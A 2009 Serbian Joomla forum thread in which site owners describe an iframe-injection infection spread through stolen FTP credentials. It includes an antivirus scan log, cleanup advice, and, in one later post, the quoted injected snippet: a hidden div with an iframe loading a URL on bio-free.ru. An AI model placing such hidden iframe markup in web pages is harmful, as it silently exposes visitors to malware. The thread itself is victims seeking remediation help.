Virusi na sajtu - trebam vasu pomoc i savet

Moderators: cicans, TheHacker

User avatar
mamica
Joomla! Explorer
Joomla! Explorer
Posts: 337
Joined: Wed Jul 02, 2008 6:46 pm
Location: Srbija
Contact:

Virusi na sajtu - trebam vasu pomoc i savet

Post by mamica » Sun Jul 12, 2009 1:40 pm

Ovako... rimetila sam u poslednja dva tri dana da se desava da mi povremeno izbaci gresku na index strani i jos jednoj (neznam napamet koja je) i to sam resavala tako sto bi izvukla doticni fajl iz bekapa (koji redovno radim) i jednostavno uploudovala. Sve bi istog trenutka radilo kako treba. Naravno da mi je bilo sumnjivo ali nikad dovoljno vremena za sve. I tako danas kada sam uradila bekapovanje, jer sam htela da ubacim jedan novi modul, prvo mi je pucalo skidanje bekapa 3 puta a kada je skinuo uradila sam skeniranje. I "odusevila" se. 60 infekcija.

Jooooooooooj Svinjski grip hara :laugh:

Danasnji i jucerasnji bekap (koji sam radila pre instaliranja nekih stvarcica) su inficirani. Pregledala sam i bekap od 04.07. i on je cist. Interesuje me da li se ovo moze izleciti vracanjem bekapa ili mora na neki drugi nacin.

Ako je samo vracanje bekapa na sajt da li je potrebno ceo ili da vratim samo ove gde se nalaze infekcije?
Ako mora na neki drugi nacin onda vas molim da mi kazete kako?
Da li ce se zbog ovoga ponistiti ono sto sam juce podesavala (nova extenzija, boje, modul...)?
Moj prvi sajt
www.superbeba.com

User avatar
belkan
Joomla! Ace
Joomla! Ace
Posts: 1160
Joined: Tue Feb 24, 2009 6:44 pm
Location: Beograd

Re: Virusi na sajtu - trebam vasu pomoc i savet

Post by belkan » Sun Jul 12, 2009 1:59 pm

Moje mišljenje:
Bekapovao bih fajlove, skenirao i zamenio inficirane, opet preskenirao i ako je čisto, vratio bekap. ;)

EDIT: A ako bi vratila bekap koji je uradjen pre izmene šablona, normalno da se izmene ne bi videle, sem ako ne bekapuješ izmenjeni šablon pa njega ubaciš u stari bekap.
.:: Zoran Belić ::.
.:: 卓然贝利奇 ::.

User avatar
Vrlo Jak Tim
Joomla! Hero
Joomla! Hero
Posts: 2319
Joined: Mon Nov 07, 2005 12:58 am
Location: Bar, Crna Gora

Re: Virusi na sajtu - trebam vasu pomoc i savet

Post by Vrlo Jak Tim » Sun Jul 12, 2009 8:36 pm

Ako je samo vracanje bekapa na sajt da li je potrebno ceo ili da vratim samo ove gde se nalaze infekcije?
Ako mora na neki drugi nacin onda vas molim da mi kazete kako?
Da li ce se zbog ovoga ponistiti ono sto sam juce podesavala (nova extenzija, boje, modul...)?
- samo inficirane fajlove,
- poništiće se samo ono što je (ako je) upisivano u te inficirane fajlove.
- nove ekstenzije će nastaviti da rade normalno.

Mogla si malo da nam daš od tog inficiranog koda, da vidimo na čemu smo, i verziju Joomle.
Evo lucky shoot: promijeni FTP password, i pokušaj da nekoliko dana ne koristiš FTP klijent. Instaliraj neku Joomlinu "FeTePe-jastu" ekstenziju (eXtplorer) pa sve što radiš - radi sa njim.

Jedan moj 1.0.15 sajt je onomad bilo bolestan od toga što je saradnikov računar bio nečim zaražen, a to nešto je svaki put kad bi se on logovao FTP klijentom na sajt, slalo tamo nekome podatke za FTP pristup, i mijenjani su index.php i index.html fajlovi u svim folderima.
Dragan Djordjevic
Member of Joomla! Montenegrin Translation Team
http://www.joomlamontenegro.com

User avatar
mamica
Joomla! Explorer
Joomla! Explorer
Posts: 337
Joined: Wed Jul 02, 2008 6:46 pm
Location: Srbija
Contact:

Re: Virusi na sajtu - trebam vasu pomoc i savet

Post by mamica » Mon Jul 13, 2009 9:32 am

Joomla je 1.5.12
Evo svih mojih ljepotica :) Jeste malo dugacko ali da ne preskocim nesto vazno :)

Code: Select all

C:\Documents and Settings\user\Desktop\backup-superbeba.com-7-12-2009.tar.gz;"Virus found HTML/Framer";"Infected"
C:\Documents and Settings\user\Desktop\backup-superbeba.com-7-12-2009.tar.gz:\backup-superbeba.com-7-12-2009.tar;"Virus found HTML/Framer";"Infected"
C:\Documents and Settings\user\Desktop\backup-superbeba.com-7-12-2009.tar.gz:\backup-superbeba.com-7-12-2009.tar:\.\public_html\administrator\components\com_acajoom\backup\index.html;"Virus found HTML/Framer";"Infected"
C:\Documents and Settings\user\Desktop\backup-superbeba.com-7-12-2009.tar.gz:\backup-superbeba.com-7-12-2009.tar:\.\public_html\administrator\components\com_acajoom\bots\index.html;"Virus found HTML/Framer";"Infected"
C:\Documents and Settings\user\Desktop\backup-superbeba.com-7-12-2009.tar.gz:\backup-superbeba.com-7-12-2009.tar:\.\public_html\administrator\components\com_acajoom\classes\index.html;"Virus found HTML/Framer";"Infected"
C:\Documents and Settings\user\Desktop\backup-superbeba.com-7-12-2009.tar.gz:\backup-superbeba.com-7-12-2009.tar:\.\public_html\administrator\components\com_acajoom\cssadmin\index.html;"Virus found HTML/Framer";"Infected"
C:\Documents and Settings\user\Desktop\backup-superbeba.com-7-12-2009.tar.gz:\backup-superbeba.com-7-12-2009.tar:\.\public_html\administrator\components\com_config\controllers\index.html;"Virus found HTML/Framer";"Infected"
C:\Documents and Settings\user\Desktop\backup-superbeba.com-7-12-2009.tar.gz:\backup-superbeba.com-7-12-2009.tar:\.\public_html\administrator\components\com_config\index.html;"Virus found HTML/Framer";"Infected"
C:\Documents and Settings\user\Desktop\backup-superbeba.com-7-12-2009.tar.gz:\backup-superbeba.com-7-12-2009.tar:\.\public_html\administrator\components\com_config\views\application\index.html;"Virus found HTML/Framer";"Infected"
C:\Documents and Settings\user\Desktop\backup-superbeba.com-7-12-2009.tar.gz:\backup-superbeba.com-7-12-2009.tar:\.\public_html\administrator\components\com_config\views\application\tmpl\index.html;"Virus found HTML/Framer";"Infected"
C:\Documents and Settings\user\Desktop\backup-superbeba.com-7-12-2009.tar.gz:\backup-superbeba.com-7-12-2009.tar:\.\public_html\administrator\components\com_config\views\index.html;"Virus found HTML/Framer";"Infected"
C:\Documents and Settings\user\Desktop\backup-superbeba.com-7-12-2009.tar.gz:\backup-superbeba.com-7-12-2009.tar:\.\public_html\administrator\components\com_acajoom\images\index.html;"Virus found HTML/Framer";"Infected"
C:\Documents and Settings\user\Desktop\backup-superbeba.com-7-12-2009.tar.gz:\backup-superbeba.com-7-12-2009.tar:\.\public_html\administrator\components\com_acajoom\index.html;"Virus found HTML/Framer";"Infected"
C:\Documents and Settings\user\Desktop\backup-superbeba.com-7-12-2009.tar.gz:\backup-superbeba.com-7-12-2009.tar:\.\public_html\administrator\components\com_acajoom\language\index.html;"Virus found HTML/Framer";"Infected"
C:\Documents and Settings\user\Desktop\backup-superbeba.com-7-12-2009.tar.gz:\backup-superbeba.com-7-12-2009.tar:\.\public_html\administrator\components\com_acajoom\templates\default\default.html;"Virus found HTML/Framer";"Infected"
C:\Documents and Settings\user\Desktop\backup-superbeba.com-7-12-2009.tar.gz:\backup-superbeba.com-7-12-2009.tar:\.\public_html\administrator\components\com_acajoom\templates\index.html;"Virus found HTML/Framer";"Infected"
C:\Documents and Settings\user\Desktop\backup-superbeba.com-7-12-2009.tar.gz:\backup-superbeba.com-7-12-2009.tar:\.\public_html\administrator\components\com_banners\controllers\index.html;"Virus found HTML/Framer";"Infected"
C:\Documents and Settings\user\Desktop\backup-superbeba.com-7-12-2009.tar.gz:\backup-superbeba.com-7-12-2009.tar:\.\public_html\administrator\components\com_banners\elements\index.html;"Virus found HTML/Framer";"Infected"
C:\Documents and Settings\user\Desktop\backup-superbeba.com-7-12-2009.tar.gz:\backup-superbeba.com-7-12-2009.tar:\.\public_html\administrator\components\com_media\assets\index.html;"Virus found HTML/Framer";"Infected"
C:\Documents and Settings\user\Desktop\backup-superbeba.com-7-12-2009.tar.gz:\backup-superbeba.com-7-12-2009.tar:\.\public_html\administrator\components\com_media\controllers\index.html;"Virus found HTML/Framer";"Infected"
C:\Documents and Settings\user\Desktop\backup-superbeba.com-7-12-2009.tar.gz:\backup-superbeba.com-7-12-2009.tar:\.\public_html\administrator\components\com_media\helpers\index.html;"Virus found HTML/Framer";"Infected"
C:\Documents and Settings\user\Desktop\backup-superbeba.com-7-12-2009.tar.gz:\backup-superbeba.com-7-12-2009.tar:\.\public_html\administrator\components\com_media\images\index.html;"Virus found HTML/Framer";"Infected"
C:\Documents and Settings\user\Desktop\backup-superbeba.com-7-12-2009.tar.gz:\backup-superbeba.com-7-12-2009.tar:\.\public_html\administrator\components\com_media\images\mime-icon-16\index.html;"Virus found HTML/Framer";"Infected"
C:\Documents and Settings\user\Desktop\backup-superbeba.com-7-12-2009.tar.gz:\backup-superbeba.com-7-12-2009.tar:\.\public_html\administrator\components\com_media\images\mime-icon-32\index.html;"Virus found HTML/Framer";"Infected"
C:\Documents and Settings\user\Desktop\backup-superbeba.com-7-12-2009.tar.gz:\backup-superbeba.com-7-12-2009.tar:\.\public_html\administrator\components\com_media\views\images\index.html;"Virus found HTML/Framer";"Infected"
C:\Documents and Settings\user\Desktop\backup-superbeba.com-7-12-2009.tar.gz:\backup-superbeba.com-7-12-2009.tar:\.\public_html\administrator\components\com_media\views\images\tmpl\default.php;"Virus found HTML/Framer";"Infected"
C:\Documents and Settings\user\Desktop\backup-superbeba.com-7-12-2009.tar.gz:\backup-superbeba.com-7-12-2009.tar:\.\public_html\administrator\components\com_media\views\media\index.html;"Virus found HTML/Framer";"Infected"
C:\Documents and Settings\user\Desktop\backup-superbeba.com-7-12-2009.tar.gz:\backup-superbeba.com-7-12-2009.tar:\.\public_html\administrator\components\com_media\views\images\tmpl\index.html;"Virus found HTML/Framer";"Infected"
C:\Documents and Settings\user\Desktop\backup-superbeba.com-7-12-2009.tar.gz:\backup-superbeba.com-7-12-2009.tar:\.\public_html\administrator\components\com_media\views\imageslist\index.html;"Virus found HTML/Framer";"Infected"
C:\Documents and Settings\user\Desktop\backup-superbeba.com-7-12-2009.tar.gz:\backup-superbeba.com-7-12-2009.tar:\.\public_html\administrator\components\com_media\views\imageslist\tmpl\default_image.php;"Virus found HTML/Framer";"Infected"
C:\Documents and Settings\user\Desktop\backup-superbeba.com-7-12-2009.tar.gz:\backup-superbeba.com-7-12-2009.tar:\.\public_html\administrator\components\com_media\views\imageslist\tmpl\index.html;"Virus found HTML/Framer";"Infected"
C:\Documents and Settings\user\Desktop\backup-superbeba.com-7-12-2009.tar.gz:\backup-superbeba.com-7-12-2009.tar:\.\public_html\administrator\components\com_media\views\media\tmpl\default.php;"Virus found HTML/Framer";"Infected"
C:\Documents and Settings\user\Desktop\backup-superbeba.com-7-12-2009.tar.gz:\backup-superbeba.com-7-12-2009.tar:\.\public_html\administrator\components\com_media\views\media\tmpl\index.html;"Virus found HTML/Framer";"Infected"
C:\Documents and Settings\user\Desktop\backup-superbeba.com-7-12-2009.tar.gz:\backup-superbeba.com-7-12-2009.tar:\.\public_html\administrator\components\com_banners\helpers\index.html;"Virus found HTML/Framer";"Infected"
C:\Documents and Settings\user\Desktop\backup-superbeba.com-7-12-2009.tar.gz:\backup-superbeba.com-7-12-2009.tar:\.\public_html\administrator\components\com_banners\index.html;"Virus found HTML/Framer";"Infected"
C:\Documents and Settings\user\Desktop\backup-superbeba.com-7-12-2009.tar.gz:\backup-superbeba.com-7-12-2009.tar:\.\public_html\administrator\components\com_banners\tables\index.html;"Virus found HTML/Framer";"Infected"
C:\Documents and Settings\user\Desktop\backup-superbeba.com-7-12-2009.tar.gz:\backup-superbeba.com-7-12-2009.tar:\.\public_html\administrator\components\com_banners\views\index.html;"Virus found HTML/Framer";"Infected"
C:\Documents and Settings\user\Desktop\backup-superbeba.com-7-12-2009.tar.gz:\backup-superbeba.com-7-12-2009.tar:\.\public_html\administrator\components\com_checkin\index.html;"Virus found HTML/Framer";"Infected"
C:\Documents and Settings\user\Desktop\backup-superbeba.com-7-12-2009.tar.gz:\backup-superbeba.com-7-12-2009.tar:\.\public_html\administrator\components\com_cpanel\index.html;"Virus found HTML/Framer";"Infected"
C:\Documents and Settings\user\Desktop\backup-superbeba.com-7-12-2009.tar.gz:\backup-superbeba.com-7-12-2009.tar:\.\public_html\administrator\components\com_frontpage\index.html;"Virus found HTML/Framer";"Infected"
C:\Documents and Settings\user\Desktop\backup-superbeba.com-7-12-2009.tar.gz:\backup-superbeba.com-7-12-2009.tar:\.\public_html\administrator\components\com_massmail\index.html;"Virus found HTML/Framer";"Infected"
C:\Documents and Settings\user\Desktop\backup-superbeba.com-7-12-2009.tar.gz:\backup-superbeba.com-7-12-2009.tar:\.\public_html\administrator\components\com_media\index.html;"Virus found HTML/Framer";"Infected"
C:\Documents and Settings\user\Desktop\backup-superbeba.com-7-12-2009.tar.gz:\backup-superbeba.com-7-12-2009.tar:\.\public_html\administrator\components\com_media\views\medialist\index.html;"Virus found HTML/Framer";"Infected"
C:\Documents and Settings\user\Desktop\backup-superbeba.com-7-12-2009.tar.gz:\backup-superbeba.com-7-12-2009.tar:\.\public_html\administrator\components\com_media\views\medialist\tmpl\index.html;"Virus found HTML/Framer";"Infected"
C:\Documents and Settings\user\Desktop\backup-superbeba.com-7-12-2009.tar.gz:\backup-superbeba.com-7-12-2009.tar:\.\public_html\administrator\components\com_frontpage\views\index.html;"Virus found HTML/Framer";"Infected"
C:\Documents and Settings\user\Desktop\backup-superbeba.com-7-12-2009.tar.gz:\backup-superbeba.com-7-12-2009.tar:\.\public_html\administrator\components\com_menus\assets\images\index.html;"Virus found HTML/Framer";"Infected"
C:\Documents and Settings\user\Desktop\backup-superbeba.com-7-12-2009.tar.gz:\backup-superbeba.com-7-12-2009.tar:\.\public_html\administrator\components\com_menus\assets\index.html;"Virus found HTML/Framer";"Infected"
C:\Documents and Settings\user\Desktop\backup-superbeba.com-7-12-2009.tar.gz:\backup-superbeba.com-7-12-2009.tar:\.\public_html\administrator\components\com_menus\assets\rtl_images\index.html;"Virus found HTML/Framer";"Infected"
C:\Documents and Settings\user\Desktop\backup-superbeba.com-7-12-2009.tar.gz:\backup-superbeba.com-7-12-2009.tar:\.\public_html\administrator\components\com_menus\classes\index.html;"Virus found HTML/Framer";"Infected"
C:\Documents and Settings\user\Desktop\backup-superbeba.com-7-12-2009.tar.gz:\backup-superbeba.com-7-12-2009.tar:\.\public_html\administrator\components\com_menus\helpers\index.html;"Virus found HTML/Framer";"Infected"
C:\Documents and Settings\user\Desktop\backup-superbeba.com-7-12-2009.tar.gz:\backup-superbeba.com-7-12-2009.tar:\.\public_html\administrator\components\com_menus\index.html;"Virus found HTML/Framer";"Infected"
C:\Documents and Settings\user\Desktop\backup-superbeba.com-7-12-2009.tar.gz:\backup-superbeba.com-7-12-2009.tar:\.\public_html\administrator\components\com_menus\models\index.html;"Virus found HTML/Framer";"Infected"
C:\Documents and Settings\user\Desktop\backup-superbeba.com-7-12-2009.tar.gz:\backup-superbeba.com-7-12-2009.tar:\.\public_html\administrator\components\com_menus\models\metadata\index.html;"Virus found HTML/Framer";"Infected"
C:\Documents and Settings\user\Desktop\backup-superbeba.com-7-12-2009.tar.gz:\backup-superbeba.com-7-12-2009.tar:\.\public_html\administrator\components\com_menus\views\index.html;"Virus found HTML/Framer";"Infected"
C:\Documents and Settings\user\Desktop\backup-superbeba.com-7-12-2009.tar.gz:\backup-superbeba.com-7-12-2009.tar:\.\public_html\administrator\components\com_menus\views\item\tmpl\index.html;"Virus found HTML/Framer";"Infected"
C:\Documents and Settings\user\Desktop\backup-superbeba.com-7-12-2009.tar.gz:\backup-superbeba.com-7-12-2009.tar:\.\public_html\administrator\components\com_menus\views\list\index.html;"Virus found HTML/Framer";"Infected"
C:\Documents and Settings\user\Desktop\backup-superbeba.com-7-12-2009.tar.gz:\backup-superbeba.com-7-12-2009.tar:\.\public_html\administrator\components\com_phocagallery\assets\index.html;"Virus found HTML/Framer";"Infected"
C:\Documents and Settings\user\Desktop\backup-superbeba.com-7-12-2009.tar.gz:\backup-superbeba.com-7-12-2009.tar:\.\public_html\administrator\components\com_phocagallery\index.html;"Virus found HTML/Framer";"Infected"
C:\Documents and Settings\user\Desktop\backup-superbeba.com-7-12-2009.tar.gz:\backup-superbeba.com-7-12-2009.tar:\.\public_html\administrator\components\index.html;"Virus found HTML/Framer";"Infected"
C:\Documents and Settings\user\Desktop\backup-superbeba.com-7-12-2009.tar.gz:\backup-superbeba.com-7-12-2009.tar:\.\public_html\index2.php;"Virus found HTML/Framer";"Infected"
Menjam samo FTP passw. ili i ostalo (cPanel, admin deo sajta, forum...)...?
Moj prvi sajt
www.superbeba.com

User avatar
Leftfield
Joomla! Virtuoso
Joomla! Virtuoso
Posts: 4432
Joined: Fri Dec 08, 2006 3:33 am
Contact:

Re: Virusi na sajtu - trebam vasu pomoc i savet

Post by Leftfield » Mon Jul 13, 2009 9:54 am

Bekap.

Ocisti svoj racunar prvo. Ocisti sajt u lokalu svim i svacim. Posto je Windows cisti ga sa makar 2 apdejtovana antivirusa posebno. Nemoj da su oba instalirana odjednom. Pregledaj/ocisti komp sa CCleaner, SpyBot, Lavasoft.... svacim cime stignes a da je dobar program.

Obrisi sve sa servera.

Pretrazi rucno kod. Koristi neki program za uporedjivanje fajlova (recimo Winmerge). Kako? Skines novu joomla i uporedis default fajlove. Pogledaj da nema "nekih izmjena".

Kad si ocistila sajt vrati se na server. Provjeri da nema neka skripta, izbrisi sve u tmp i cache foldere. SVE pristupne podatke izmjeni. Napravi nove naloge (korisnik i lozinku) posebno za bazu, posebno za ftp.

Sledeci korak moras odraditi sa bezbjednog racunara:
Postavi sajt na server u vidu arhive, raspakuj ga, pregledaj dozvole - 755 na foldere a 644 na fajlove. Dodatno zastiti sajt, pod uslovom da imas apache, sa htaccess-om, dodatno zastiti configuration.php, pogledaj malo sto smo pisali i to je to.
Real Estate Budva https://realestatebudva.com

User avatar
mamica
Joomla! Explorer
Joomla! Explorer
Posts: 337
Joined: Wed Jul 02, 2008 6:46 pm
Location: Srbija
Contact:

Re: Virusi na sajtu - trebam vasu pomoc i savet

Post by mamica » Mon Jul 13, 2009 10:39 am

Hvala na odgovorima. Na meni je sada da sednem i radim, radim, radim...
Moj prvi sajt
www.superbeba.com

User avatar
Vrlo Jak Tim
Joomla! Hero
Joomla! Hero
Posts: 2319
Joined: Mon Nov 07, 2005 12:58 am
Location: Bar, Crna Gora

Re: Virusi na sajtu - trebam vasu pomoc i savet

Post by Vrlo Jak Tim » Mon Jul 13, 2009 11:08 am

Ovo je sličan, ako ne i isti, problem koji sam ja imao, o kome sam pisao ispred.

Imaš u računaru neki maliciozni kod koji je napravio štetu. Jednostavno, iskorišćeni su tvoji podaci za FTP logovanje na server, a maliciozna skripta je pretražila sve foldere i u fajlove index.php, i index.html dodala svoj dio malicioznog koda.
Pogledaj datume, pa ćeš vidjeti kada ti se to desilo - index.html i index.php fajlovi će imati najsvježiji datum.

Kao što je rekao Lefti, prvo svoj računar, pa onda ostalo (ne brini za Joomlu, nije strašno ako imaš backup).

Jedan od sofvera koje sam ja koristio u posljednje vrijeme, besplatan, a služi baš za to je Malwarebytes' Anti-Malware. Njime se povremeno uvjerim da mi je računar (valjda) OK. Za stalnu zaštitu imam Spyware Terminator (takođe besplatan).

I na kraju: nijedna zaštita nije dobra ako je korisnik uporan u guranju malwarea na svoj računar. Pazi kud ideš, ukućanima izvuci uši (ukućančići nisu krivi, garant), i za početak, iskoristi Joomline FTP sposobnosti.
Dragan Djordjevic
Member of Joomla! Montenegrin Translation Team
http://www.joomlamontenegro.com

User avatar
ajfile
Joomla! Guru
Joomla! Guru
Posts: 595
Joined: Tue Sep 18, 2007 2:59 pm
Location: Beograd
Contact:

Re: Virusi na sajtu - trebam vasu pomoc i savet

Post by ajfile » Mon Jul 13, 2009 11:41 am

može li pod pitanje,, koji antivirus prog je ovo otkrio?

User avatar
Leftfield
Joomla! Virtuoso
Joomla! Virtuoso
Posts: 4432
Joined: Fri Dec 08, 2006 3:33 am
Contact:

Re: Virusi na sajtu - trebam vasu pomoc i savet

Post by Leftfield » Mon Jul 13, 2009 12:35 pm

Bilo koji (KA, Norton...). Problem je sto se jos uvijek nije otkrio izvor.
Real Estate Budva https://realestatebudva.com

User avatar
mamica
Joomla! Explorer
Joomla! Explorer
Posts: 337
Joined: Wed Jul 02, 2008 6:46 pm
Location: Srbija
Contact:

Re: Virusi na sajtu - trebam vasu pomoc i savet

Post by mamica » Mon Jul 13, 2009 1:14 pm

Vrlo Jak Tim wrote:Ovo je sličan, ako ne i isti, problem koji sam ja imao, o kome sam pisao ispred.

Imaš u računaru neki maliciozni kod koji je napravio štetu. Jednostavno, iskorišćeni su tvoji podaci za FTP logovanje na server, a maliciozna skripta je pretražila sve foldere i u fajlove index.php, i index.html dodala svoj dio malicioznog koda.
Pogledaj datume, pa ćeš vidjeti kada ti se to desilo - index.html i index.php fajlovi će imati najsvježiji datum.

Kao što je rekao Lefti, prvo svoj računar, pa onda ostalo (ne brini za Joomlu, nije strašno ako imaš backup).

Jedan od sofvera koje sam ja koristio u posljednje vrijeme, besplatan, a služi baš za to je Malwarebytes' Anti-Malware. Njime se povremeno uvjerim da mi je računar (valjda) OK. Za stalnu zaštitu imam Spyware Terminator (takođe besplatan).

I na kraju: nijedna zaštita nije dobra ako je korisnik uporan u guranju malwarea na svoj računar. Pazi kud ideš, ukućanima izvuci uši (ukućančići nisu krivi, garant), i za početak, iskoristi Joomline FTP sposobnosti.
Upravo radi proveru celog racunara. Koristim AVG i redovno se azurira svakog dana kada ukljucim racunar. Ubacicu i gore pomenuto radi bolje zastite. Bekap uvek imam. Ovo je uletelo izmedju 04.07. (za tada imam cist bekap) i 11.07 (kada je skinut sledeci bekap i to sa virusima). Mnogo je dana izmedju... Mene brine i to sto su prosli neprimeceno kada sam skinula ovaj 11-og. Tek kada sam 12.07. skinula nov bekap tada ga je primetio.
I da ukucancici nisu krivi jer nemaju pristup mom racunaru, imaju svoj u sobi. Ovo moze da bude "delo" mog muza ili mene... :pop Neko se nije pazio :)
Moj prvi sajt
www.superbeba.com

User avatar
VM Srbija
Joomla! Guru
Joomla! Guru
Posts: 721
Joined: Fri Mar 27, 2009 6:18 pm

Re: Virusi na sajtu - trebam vasu pomoc i savet

Post by VM Srbija » Mon Jul 13, 2009 1:28 pm

Jedan savet. Prilikom ciscenja komp-a od virusa najbolja je i najsigurnija varijanta cistiti ga sa drugog (neinficiranog) racunara.
It is all in my mind!!!

User avatar
dewey
Joomla! Enthusiast
Joomla! Enthusiast
Posts: 187
Joined: Sun Mar 05, 2006 3:18 pm

Re: Virusi na sajtu - trebam vasu pomoc i savet

Post by dewey » Tue Jul 14, 2009 12:32 am

Vrlo Jak Tim wrote:Ovo je sličan, ako ne i isti, problem koji sam ja imao, o kome sam pisao ispred.

Imaš u računaru neki maliciozni kod koji je napravio štetu. Jednostavno, iskorišćeni su tvoji podaci za FTP logovanje na server, a maliciozna skripta je pretražila sve foldere i u fajlove index.php, i index.html dodala svoj dio malicioznog koda.
Pogledaj datume, pa ćeš vidjeti kada ti se to desilo - index.html i index.php fajlovi će imati najsvježiji datum.

Kao što je rekao Lefti, prvo svoj računar, pa onda ostalo (ne brini za Joomlu, nije strašno ako imaš backup).

Jedan od sofvera koje sam ja koristio u posljednje vrijeme, besplatan, a služi baš za to je Malwarebytes' Anti-Malware. Njime se povremeno uvjerim da mi je računar (valjda) OK. Za stalnu zaštitu imam Spyware Terminator (takođe besplatan).

I na kraju: nijedna zaštita nije dobra ako je korisnik uporan u guranju malwarea na svoj računar. Pazi kud ideš, ukućanima izvuci uši (ukućančići nisu krivi, garant), i za početak, iskoristi Joomline FTP sposobnosti.

nista samo da se i ja upisem u listu "strelaca", isti problem, isti opisi, sto obicno vole svi reci...ni kriv ni duzan,a trebao naplatiti sutra :))))
iframe infekcija, nahlada otvoren prozor, patchovana j1.5.11. na .12, imam bekap,sad ga propustam kroz pregrst razlicitih programcica......posto se desava,javljam se poslije sa rezultatima,e da...
prvo mi se pojavilo kad hocu da se ulogujem u admin dio,da mi je u index.php-u error da nije kako treba zatvoren kod,pa izvucem iz bekapa koji je radio i onda hoce, medjutim onda javlja gresku da je errror u khepri templateu stagod...i onda krenem da iscitavam mada sam pratio temu, i rekao ma jok nece meni :)ali eto...

evo screen dijela koji sam krenuo rucno brisati,ima ih razlicitih od peps-inado ko zna cega... postavljam sliku da ne bi bio otvoren kod, ako to nije u redu, molim moderatore da modifikuju Image
hvala

p.s.
jel postoji nesto cim bih mogao da pregledam sve fajlove joomle u potrazi za ovim redovima gore?ili je to sa programom koji je leftfield spomenuo?

hvala

User avatar
Vrlo Jak Tim
Joomla! Hero
Joomla! Hero
Posts: 2319
Joined: Mon Nov 07, 2005 12:58 am
Location: Bar, Crna Gora

Re: Virusi na sajtu - trebam vasu pomoc i savet

Post by Vrlo Jak Tim » Tue Jul 14, 2009 8:43 am

Možeš Total Commanderom: u opciji za Search, izabereš vrstu fajlova *.* i zadaš kriterijum za pretragu teksta u fajlovima "zymkasi" ili čak "iframe".
Dragan Djordjevic
Member of Joomla! Montenegrin Translation Team
http://www.joomlamontenegro.com

User avatar
dewey
Joomla! Enthusiast
Joomla! Enthusiast
Posts: 187
Joined: Sun Mar 05, 2006 3:18 pm

Re: Virusi na sajtu - trebam vasu pomoc i savet

Post by dewey » Tue Jul 14, 2009 2:18 pm

hvala vjt,

evo sta sam prosao i rezultati:
-zamolio hosting support da obrisu folder u kojem je bila j1.5.12,odnosno sajt,
-obrisao rucno sa servera ostatak,poput stats, error i slicno...
-promijenio ftp pass, (user ne mogu)
-promijenio u lokalu admin pristup,svim userima dodijelio druge lozinke i informacije
-bekap sa lokala propustio kroz
ccleaner,norton360,malwareantimal,alvira,spybotsearch
,trajalo je cijelu noc :)
-vrsim pretragu sa
totalcommanderom
za rijecima kao sto je Vjt naveo u htdocs-u za sve sajtove koji su u lokalu,pa i za ovaj koji je bio inficiran,isto to provjereno i za sql fajl..

ostalo mi jos da uporedim kao sto je leftfield rekao sa novom j.1.5.12,i onda sam mislio da stavim ponovo na server?ako sam sta zaboravio, molim vas da ukazete...


sinoc sam onako brzo presao po svim fajlovima, i gdje god da sam nasao nesto poput iframe-a obrisao sam, danas ovim svim gore metodama nisam pronasao niti jedan red ovog koda...
pitam se jel to sve to dovoljno da se vratim..ili ima jos neki zacin "c" ...
hvala svima,
pozdd

EDIT_:
ne ftp vec kako stivo kaze na kraju,
I send my files in by paper tape [wikipedia.org] sent by a bonded, armed courier.
Last edited by dewey on Tue Jul 14, 2009 7:52 pm, edited 1 time in total.

User avatar
Leftfield
Joomla! Virtuoso
Joomla! Virtuoso
Posts: 4432
Joined: Fri Dec 08, 2006 3:33 am
Contact:

Re: Virusi na sajtu - trebam vasu pomoc i savet

Post by Leftfield » Tue Jul 14, 2009 2:27 pm

Real Estate Budva https://realestatebudva.com

Hellas
Joomla! Apprentice
Joomla! Apprentice
Posts: 46
Joined: Thu Sep 15, 2005 2:32 pm
Location: Bosanski Brod
Contact:

Re: Virusi na sajtu - trebam vasu pomoc i savet

Post by Hellas » Fri Jul 17, 2009 5:57 pm

evo removal tool za iframe crve
ali pazljivo koristiti jer je moguce unistiti sajt

http://www.sulumitsretsambew.org/iframe ... esguidecn/

prva stavka je promjeniti ftp lozinke
i ocistiti racunar sa kojim se pristupa sajtovima od virusa
koji radi download html i php datoteka sa vaseg sajta, radi infekciju i zatim zarazene vraca natrag na server.
Kažem ti: lovi ribu, Ahmete Sabo! - Meša Selimović
http://www.ascic.net/

MajkK
Joomla! Apprentice
Joomla! Apprentice
Posts: 34
Joined: Sat Feb 07, 2009 8:31 pm
Location: Srce Srbije

Re: Virusi na sajtu - trebam vasu pomoc i savet

Post by MajkK » Mon Sep 28, 2009 7:30 pm

Kod mene se pojavio sledeci kod:
<div style="display:none"></div>
<div style="display:none"><iframe src="http://bio-free.ru:8080:8080/ts/in.cgi?rank" width=645 height=406 ></iframe></div>
Vec treci put se opet pojavljuje na sajtu i ako sam uradeo kao sto ste naveli gore. Iskopirao na lokani hard disk i ocistio fajlove. Drugi put sam vratio bekapovan sajt koji sam imao na racunaru koji nije sadrzao ovaj ali se on stalno vraca.

Znate li u cemu je problem i gde je propust?

Bilo sta da uradim opet se vrati za nepuni ceo dan.

User avatar
Leftfield
Joomla! Virtuoso
Joomla! Virtuoso
Posts: 4432
Joined: Fri Dec 08, 2006 3:33 am
Contact:

Re: Virusi na sajtu - trebam vasu pomoc i savet

Post by Leftfield » Mon Sep 28, 2009 8:22 pm

Jesi li promjenio sve lozinke?
Real Estate Budva https://realestatebudva.com

MajkK
Joomla! Apprentice
Joomla! Apprentice
Posts: 34
Joined: Sat Feb 07, 2009 8:31 pm
Location: Srce Srbije

Re: Virusi na sajtu - trebam vasu pomoc i savet

Post by MajkK » Mon Sep 28, 2009 8:47 pm

Da.

Lozinke za FTP se menjaju nakon koriscenja.

User avatar
Leftfield
Joomla! Virtuoso
Joomla! Virtuoso
Posts: 4432
Joined: Fri Dec 08, 2006 3:33 am
Contact:

Re: Virusi na sajtu - trebam vasu pomoc i savet

Post by Leftfield » Mon Sep 28, 2009 11:48 pm

Daj napisi sta si sve zamjenio i sta si sve ocistio, koje verzije, koristis li neke 3rd party ekstenzije, onako bas kao sto smo milion puta pisali kako treba postaviti pitanje da bi dobio odgovor.

Ja imam volju da pomognem sa onim sto znam, ali pored pitanja i odgovora tipa "Jesi li... Jesam, A da nisi i ovo... Jesam i to, A mozda nisi..." i iz najbolje volje dodje mi da ne odgovaram uopste.
Real Estate Budva https://realestatebudva.com

MajkK
Joomla! Apprentice
Joomla! Apprentice
Posts: 34
Joined: Sat Feb 07, 2009 8:31 pm
Location: Srce Srbije

Re: Virusi na sajtu - trebam vasu pomoc i savet

Post by MajkK » Tue Sep 29, 2009 9:14 am

sorry.
Joomla je updejtovana.

Od komponenti se koristi:

-!JoomlaComment 3.26
-Acajoom
-AdsManager 2.2.2
